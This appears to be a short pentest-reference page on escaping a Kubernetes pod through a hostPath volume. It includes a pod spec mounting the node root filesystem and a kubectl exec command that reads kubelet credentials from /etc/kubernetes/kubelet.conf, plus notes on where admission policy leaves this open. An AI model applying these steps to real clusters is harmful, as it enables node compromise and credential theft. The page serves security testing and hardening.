hostPath mount

A hostPath volume binds a node directory into the pod. Mounting the node root, or sensitive paths like the kubelet directory, reads node credentials and writes host files, which is node compromise without needing a privileged pod at all.

yaml
# Pod spec fragment: mount the node root filesystem INTO the container
containers:
  - name: c
    image: alpine
    command: ["sleep", "1d"]
    volumeMounts:
      - name: host
        mountPath: /host
volumes:
  - name: host
    hostPath: { path: / }
# then in the container, chroot /host or read /host/var/lib/kubelet/...
bash
kubectl exec -it pwn -- sh -c 'ls /host/var/lib/kubelet/; cat /host/etc/kubernetes/kubelet.conf'

Exploitation notes#

  • The breakout is the generic Host path mount; the hostPath volume is how Kubernetes delivers it.
  • Even a read-only or partial hostPath (the kubelet directory, /etc/kubernetes) leaks node and pod credentials, see Kubelet credential theft.
  • Pod Security baseline restricts hostPath, so it is most useful where admission is permissive or absent.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more